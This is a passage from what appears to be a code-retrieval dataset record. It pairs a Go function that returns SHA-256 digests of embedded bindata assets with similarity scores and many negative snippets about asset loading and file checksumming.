-1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}" ]
[ "0.56954896", "0.55540454", "0.54858077", "0.5334699", "0.5311389", "0.5301947", "0.5253766", "0.5253766", "0.5253766", "0.5253766", "0.5253766", "0.5253766", "0.5253766", "0.5253766", "0.5253766", "0.5253766", "0.5253766", "0.5253766", "0.5253766", "0.5253766", "0.5253766", "0.5253766", "0.5253766", "0.5253766", "0.52468693", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518", "0.5244518" ]
0.76954794
48
Digests returns a map of all known files and their checksums.
func Digests() (map[string][sha256.Size]byte, error) { mp := make(map[string][sha256.Size]byte, len(_bindata)) for name := range _bindata { a, err := _bindata[name]() if err != nil { return nil, err } mp[name] = a.digest } return mp, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func filesDigest(fs afero.Fs, paths []string) []*PackageFilesDigest {\n\treturn mapPaths(fs, paths, pathToOperator)\n}", "func Md5All(root string) (map[string][md5.Size]byte, error) {\n\tdone := make(chan struct{})\n\tdefer close(done)\n\n\tpaths, errc := walkFiles(done, root)\n\n\t// Starts a fixed number of goroutines to read and digest files\n\tc := make(chan result)\n\tvar wg sync.WaitGroup\n\twg.Add(numDigesters)\n\tfor i := 0; i < numDigesters; i++ {\n\t\tgo func() {\n\t\t\tdigester(done, paths, c)\n\t\t\twg.Done()\n\t\t}()\n\t}\n\tgo func() {\n\t\twg.Wait()\n\t\tclose(c)\n\t}()\n\t// End of pipeline\n\n\tm := make(map[string][md5.Size]byte)\n\tfor r := range c {\n\t\tif r.err != nil {\n\t\t\treturn nil, r.err\n\t\t}\n\t\tm[r.path] = r.sum\n\t}\n\t// Check whether the walk failed\n\tif err := <-errc; err != nil {\n\t\treturn nil, err\n\t}\n\treturn m, nil\n}", "func MD5All(root string) (map[string][md5.Size]byte, error) {\n\t// MD5All closes the done channel when it returns; it may do so before\n\t// receiving all the values from c and errc\n\tparallelism := contour.GetInt(\"parallel\")\n\n\tdone := make(chan struct{})\n\tdefer close(done)\n\n\tpaths, errc := walkFiles(done, root)\n\n\t// Start the goroutines for digestion\n\tc := make(chan MD5Result)\n\tvar wg sync.WaitGroup\n\twg.Add(parallelism)\n\tfor i := 0; i < parallelism; i++ {\n\t\tgo func() {\n\t\t\tMD5Digester(done, paths, c)\n\t\t\twg.Done()\n\t\t}()\n\t}\n\tgo func() {\n\t\twg.Wait()\n\t\tclose(c)\n\t}()\n\n\t// range through the results and add to the map\n\tm := make(map[string][md5.Size]byte)\n\tfor r := range c {\n\t\tif r.err != nil {\n\t\t\treturn nil, r.err\n\t\t}\n\t\tm[r.path] = r.sum\n\t}\n\tif err := <-errc; err != nil {\n\t\treturn nil, err\n\t}\n\treturn m, nil\n}", "func ChecksumFilesFS(fs fs.FileSystem, groups ...[]File) {\n\tstart := time.Now()\n\n\ttotalFiles := 0\n\ttotalBytes := util.ByteCount(0)\n\tfor _, files := range groups {\n\t\tfor _, f := range files {\n\t\t\tif (f.IsRegular() || f.IsSymlink()) && !f.HasChecksum() {\n\t\t\t\ttotalFiles += 1\n\t\t\t\ttotalBytes += util.ByteCount(f.Size)\n\t\t\t}\n\t\t}\n\t}\n\n\tif totalFiles == 0 {\n\t\treturn // no files to hash\n\t}\n\n\tlog.Printf(\"check: calculating hashes for %d files (%s).\\n\", totalFiles,\n\t\ttotalBytes)\n\n\tdoneFiles := 0\n\tdoneBytes := util.ByteCount(0)\n\n\ttimer := util.NewTimer(1800, func() {\n\t\tprogress := doneBytes / totalBytes * 100\n\t\tlog.Printf(\"check: busy. %d files (%s, %.1f%%) hashed.\\n\", doneFiles,\n\t\t\tdoneBytes, progress)\n\t})\n\n\tfor i, files := range groups {\n\t\tfor j, f := range files {\n\t\t\tvar hash [sha1.Size]byte\n\t\t\tvar length int\n\t\t\tif f.IsRegular() {\n\t\t\t\thash, length = checksumFile(fs, f.Path())\n\t\t\t} else if f.IsSymlink() {\n\t\t\t\thash, length = checksumSymlink(fs, f.Path())\n\t\t\t} else {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\t//log.Printf(\"check: read %q\\n\", f.Path())\n\t\t\tgroups[i][j].SHA1 = hash\n\t\t\tdoneFiles += 1\n\t\t\tdoneBytes += util.ByteCount(length)\n\t\t}\n\t}\n\n\ttimer.Stop()\n\n\telapsed := time.Since(start)\n\tlog.Printf(\"check: done. %d files (%s) hashed. took %s.\\n\", doneFiles,\n\t\tdoneBytes, elapsed)\n}", "func MD5All(root string) (map[string][md5.Size]byte, error) {\n\t// MD5All closes the done channel when it returns; it may do so before\n\t// receiving all the values from c and errc.\n\tdone := make(chan struct{}) // HLdone\n\tdefer close(done) // HLdone\n\n\tc, errc := sumFiles(done, root) // HLdone\n\n\tm := make(map[string][md5.Size]byte)\n\tfor r := range c { // HLrange\n\t\tif r.err != nil {\n\t\t\treturn nil, r.err\n\t\t}\n\t\tm[r.path] = r.sum\n\t}\n\tif err := <-errc; err != nil {\n\t\treturn nil, err\n\t}\n\treturn m, nil\n}", "func HashFiles(files []string) string {\n\thasher := md5.New()\n\n\tfor i := 0; i < len(files); i++ {\n\t\tfp, err := os.Open(files[i])\n\t\tif err != nil {\n\t\t\tcontinue\n\t\t}\n\t\tfor {\n\t\t\tbuffer := make([]byte, 8192, 8192)\n\t\t\tbytes_read, err := fp.Read(buffer)\n\t\t\tif bytes_read > 0 {\n\t\t\t\thasher.Write(buffer)\n\t\t\t}\n\n\t\t\tif err != nil {\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}\n\n\ts := make([]byte, 0)\n\n\treturn hex.EncodeToString(hasher.Sum(s))\n\n}", "func GetFilesMetadataHash(paths []string) (string, error) {\n\thashData := make([]string, 0, len(paths))\n\n\tfor _, path := range paths {\n\t\tmeta, err := os.Stat(path)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"couldn't stat '%s': %v\", path, err)\n\t\t}\n\n\t\thashData = append(hashData, meta.Name()+strconv.FormatInt(meta.Size(), 10)+meta.ModTime().String())\n\t}\n\n\t// sort the strings so that the same paths in different order still generate the same hash\n\tsort.Strings(hashData)\n\n\th := sha256.Sum256([]byte(strings.Join(hashData, \"\")))\n\treturn base64.StdEncoding.EncodeToString(h[:]), nil\n}", "func (ss *Sources) hashAll(path string) (hash.Hash, error) {\n\th := sha1.New()\n\terr := filepath.Walk(path, func(path string, info os.FileInfo, err error) error {\n\t\tif err != nil {\n\t\t\treturn nil\n\t\t}\n\t\t_, _ = io.WriteString(h, path)\n\n\t\tif info.IsDir() {\n\t\t\treturn nil\n\t\t}\n\n\t\tr, err := os.Open(path)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tdefer func(r *os.File) {\n\t\t\terr := r.Close()\n\t\t\tif err != nil {\n\t\t\t\tss.Log.Error(err, \"hashAll\")\n\t\t\t}\n\t\t}(r)\n\t\t_, err = io.Copy(h, r)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\treturn nil\n\t})\n\n\treturn h, err\n}", "func (md *Metadata) Digest() metadata.Digest {\n\tsshKeys := make(map[string][]ssh.Key)\n\n\tfor usr, rawKeys := range md.PublicKeys {\n\t\tkeys := strings.Split(rawKeys, \"\\n\")\n\n\t\tfor _, key := range keys {\n\t\t\tif key != \"\" {\n\t\t\t\tsshKeys[usr] = append(sshKeys[usr], ssh.Key(key))\n\t\t\t}\n\t\t}\n\t}\n\n\treturn metadata.Digest{\n\t\tHostname: md.Hostname,\n\t\tSSHKeys: sshKeys,\n\t}\n}", "func (r *HashRing) Checksums() (checksums map[string]uint32) {\n\tr.RLock()\n\t// even though the map is immutable the pointer to it is not so it requires\n\t// a readlock\n\tchecksums = r.checksums\n\tr.RUnlock()\n\treturn\n}", "func hashDir(hc hashConstructor, dirname string) ([]byte, error) {\n\t// ReadDir returns the entries sorted by filename\n\tdirEntries, err := os.ReadDir(dirname)\n\tif err != nil {\n\t\treturn nil, errs.FileError(err, dirname)\n\t}\n\tst, err := os.Stat(dirname)\n\tif err != nil {\n\t\treturn nil, errs.FileError(err, dirname)\n\t}\n\n\tvar sum []byte\n\tmode := make([]byte, 4)\n\n\t// calculate sum of contents and mode\n\th := hc()\n\tbinary.LittleEndian.PutUint32(mode, uint32(st.Mode()))\n\th.Write(mode)\n\tfor _, dirEntry := range dirEntries {\n\t\tfi, err := dirEntry.Info()\n\t\tif err != nil {\n\t\t\treturn nil, errs.FileError(err, dirEntry.Name())\n\t\t}\n\t\tname := path.Join(dirname, fi.Name())\n\t\tswitch {\n\t\tcase fi.IsDir():\n\t\t\tsum, err = hashDir(hc, name)\n\t\tcase fi.Mode()&os.ModeSymlink != 0:\n\t\t\tbinary.LittleEndian.PutUint32(mode, uint32(fi.Mode()))\n\t\t\th.Write(mode)\n\t\t\tsum, err = hashSymlink(hc, name)\n\t\tdefault:\n\t\t\tbinary.LittleEndian.PutUint32(mode, uint32(fi.Mode()))\n\t\t\th.Write(mode)\n\t\t\tsum, err = hashFile(hc(), name)\n\t\t}\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\th.Write(sum)\n\t}\n\n\treturn h.Sum(nil), nil\n}", "func (f *Fs) Hashes() hash.Set {\n\thashes := hash.Set(hash.None)\n\tif f.hasOCMD5 {\n\t\thashes.Add(hash.MD5)\n\t}\n\tif f.hasOCSHA1 || f.hasMESHA1 {\n\t\thashes.Add(hash.SHA1)\n\t}\n\treturn hashes\n}", "func ChecksumFiles(groups ...[]File) {\n\tChecksumFilesFS(DefaultFileSystem, groups...)\n}", "func getFilesFromRelease(p string, r io.Reader) ([]*FileInfo, Paragraph, error) {\n\tdir := path.Dir(p)\n\n\td, err := NewParser(r).Read()\n\tif err != nil {\n\t\treturn nil, nil, errors.Wrap(err, \"NewParser(r).Read()\")\n\t}\n\n\tmd5sums := d[\"MD5Sum\"]\n\tsha1sums := d[\"SHA1\"]\n\tsha256sums := d[\"SHA256\"]\n\n\tif len(md5sums) == 0 && len(sha1sums) == 0 && len(sha256sums) == 0 {\n\t\treturn nil, d, nil\n\t}\n\n\tm := make(map[string]*FileInfo)\n\n\tfor _, l := range md5sums {\n\t\tp, size, csum, err := parseChecksum(l)\n\t\tp = path.Join(dir, path.Clean(p))\n\t\tif err != nil {\n\t\t\treturn nil, nil, errors.Wrap(err, \"parseChecksum for md5sums\")\n\t\t}\n\n\t\tfi := &FileInfo{\n\t\t\tpath: p,\n\t\t\tsize: size,\n\t\t\tmd5sum: csum,\n\t\t}\n\t\tm[p] = fi\n\t}\n\n\tfor _, l := range sha1sums {\n\t\tp, size, csum, err := parseChecksum(l)\n\t\tp = path.Join(dir, path.Clean(p))\n\t\tif err != nil {\n\t\t\treturn nil, nil, errors.Wrap(err, \"parseChecksum for sha1sums\")\n\t\t}\n\n\t\tfi, ok := m[p]\n\t\tif ok {\n\t\t\tfi.sha1sum = csum\n\t\t} else {\n\t\t\tfi := &FileInfo{\n\t\t\t\tpath: p,\n\t\t\t\tsize: size,\n\t\t\t\tsha1sum: csum,\n\t\t\t}\n\t\t\tm[p] = fi\n\t\t}\n\t}\n\n\tfor _, l := range sha256sums {\n\t\tp, size, csum, err := parseChecksum(l)\n\t\tp = path.Join(dir, path.Clean(p))\n\t\tif err != nil {\n\t\t\treturn nil, nil, errors.Wrap(err, \"parseChecksum for sha256sums\")\n\t\t}\n\n\t\tfi, ok := m[p]\n\t\tif ok {\n\t\t\tfi.sha256sum = csum\n\t\t} else {\n\t\t\tfi := &FileInfo{\n\t\t\t\tpath: p,\n\t\t\t\tsize: size,\n\t\t\t\tsha256sum: csum,\n\t\t\t}\n\t\t\tm[p] = fi\n\t\t}\n\t}\n\n\t// WORKAROUND: some (e.g. dell) repositories have invalid Release\n\t// that contains wrong checksum for Release itself. Ignore them.\n\tdelete(m, path.Join(dir, \"Release\"))\n\tdelete(m, path.Join(dir, \"Release.gpg\"))\n\tdelete(m, path.Join(dir, \"InRelease\"))\n\n\tl := make([]*FileInfo, 0, len(m))\n\tfor _, fi := range m {\n\t\tl = append(l, fi)\n\t}\n\treturn l, d, nil\n}", "func (i *AppxDigest) digestFile(f *zipslicer.File, doPageHash bool) error {\n\tvar peWriters []io.WriteCloser\n\tvar peResults []<-chan peDigestResult\n\tvar sink io.Writer\n\tif strings.HasSuffix(f.Name, \".exe\") || strings.HasSuffix(f.Name, \".dll\") {\n\t\t// DigestPE wants a Reader so make a pipe for each one and sink data into the pipes\n\t\tpeWriters, peResults = setupPeDigests(f.Name, i.Hash, doPageHash)\n\t\tdefer func() {\n\t\t\tfor _, w := range peWriters {\n\t\t\t\tw.Close()\n\t\t\t}\n\t\t}()\n\t\tmw := make([]io.Writer, len(peWriters))\n\t\tfor i, w := range peWriters {\n\t\t\tmw[i] = w\n\t\t}\n\t\tsink = io.MultiWriter(mw...)\n\t}\n\tif err := i.blockMap.AddFile(f, i.axpc, sink); err != nil {\n\t\treturn err\n\t}\n\tif peWriters != nil {\n\t\tfor _, w := range peWriters {\n\t\t\tw.Close()\n\t\t}\n\t\tfor _, ch := range peResults {\n\t\t\tresult := <-ch\n\t\t\tif result.err != nil {\n\t\t\t\treturn result.err\n\t\t\t}\n\t\t\ti.peDigests = append(i.peDigests, result.digest)\n\t\t}\n\t}\n\treturn nil\n}", "func (h *MultiHasher) Sums() (hashMD5, hashSHA1, hashSHA256, hashSHA512 []byte) {\n\thashMD5 = h.md5.Sum(nil)\n\thashSHA1 = h.sha1.Sum(nil)\n\thashSHA256 = h.sha256.Sum(nil)\n\thashSHA512 = h.sha512.Sum(nil)\n\treturn hashMD5, hashSHA1, hashSHA256, hashSHA512\n}", "func (hasher *FileHasher) HashFile(path string) (map[HashType]Digest, error) {\n\tinfo, err := os.Stat(path)\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"failed to stat file %v\", path)\n\t}\n\n\t// Throttle reading and hashing rate.\n\tif len(hasher.config.HashTypes) > 0 {\n\t\terr = hasher.throttle(info.Size())\n\t\tif err != nil {\n\t\t\treturn nil, errors.Wrapf(err, \"failed to hash file %v\", path)\n\t\t}\n\t}\n\n\tvar hashes []hash.Hash\n\tfor _, hashType := range hasher.config.HashTypes {\n\t\th, valid := validHashes[hashType]\n\t\tif !valid {\n\t\t\treturn nil, errors.Errorf(\"unknown hash type '%v'\", hashType)\n\t\t}\n\n\t\thashes = append(hashes, h())\n\t}\n\n\tif len(hashes) > 0 {\n\t\tf, err := file.ReadOpen(path)\n\t\tif err != nil {\n\t\t\treturn nil, errors.Wrap(err, \"failed to open file for hashing\")\n\t\t}\n\t\tdefer f.Close()\n\n\t\thashWriter := multiWriter(hashes)\n\t\tif _, err := io.Copy(hashWriter, f); err != nil {\n\t\t\treturn nil, errors.Wrap(err, \"failed to calculate file hashes\")\n\t\t}\n\n\t\tnameToHash := make(map[HashType]Digest, len(hashes))\n\t\tfor i, h := range hashes {\n\t\t\tnameToHash[hasher.config.HashTypes[i]] = h.Sum(nil)\n\t\t}\n\n\t\treturn nameToHash, nil\n\t}\n\n\treturn nil, nil\n}", "func HashFiles(fs []*common.File, hashAlgorithm string) error {\n\tvar commonErr error\n\tsfl := &common.SafeFileList{List: fs}\n\n\t// End workers channel handler\n\twg := new(sync.WaitGroup)\n\twg.Add(runtime.NumCPU())\n\tdone := make(chan bool)\n\tgo func() {\n\t\twg.Wait()\n\t\tdone<-true\n\t}()\n\n\t// Make control channels\n\tpauseChans, pause := createMultipleChans(runtime.NumCPU())\n\tresumeChans, resume := createMultipleChans(runtime.NumCPU())\n\tstopChans, stop := createMultipleChans(runtime.NumCPU())\n\n\tfor i:=0; i<runtime.NumCPU(); i++ {\n\t\tgo func(pauseChan, resumeChan, stopChan chan bool) {\n\t\t\tdefer wg.Done()\n\t\t\th := hash.NewHasher(hashAlgorithm, 128*1024)\n\n\t\t\tfor {\n\t\t\t\tselect {\n\t\t\t\tcase <-pauseChan:\n\t\t\t\t\tselect {\n\t\t\t\t\tcase <-stopChan:\n\t\t\t\t\t\treturn\n\t\t\t\t\tcase <-resumeChan:\n\t\t\t\t\t}\n\t\t\t\tcase <-stopChan:\n\t\t\t\t\treturn\n\t\t\t\tdefault:\n\t\t\t\t}\n\n\t\t\t\tif commonErr != nil {\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tf := sfl.Next()\n\t\t\t\tif f == nil {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\toutput.NewPartialStep(\"Hash file \" + f.AbsPath)\n\t\t\t\tif err := h.HashFile(f); err != nil {\n\t\t\t\t\tcommonErr = err\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}(pauseChans[i], resumeChans[i], stopChans[i])\n\t}\n\n\tfor {\n\t\tselect {\n\t\tcase <-input.Pause:\n\t\t\tpause()\n\t\tcase <-input.Resume:\n\t\t\tresume()\n\t\tcase <-input.Stop:\n\t\t\tstop()\n\t\t\t<-done\n\t\t\treturn output.ErrProcessStopped\n\t\tcase 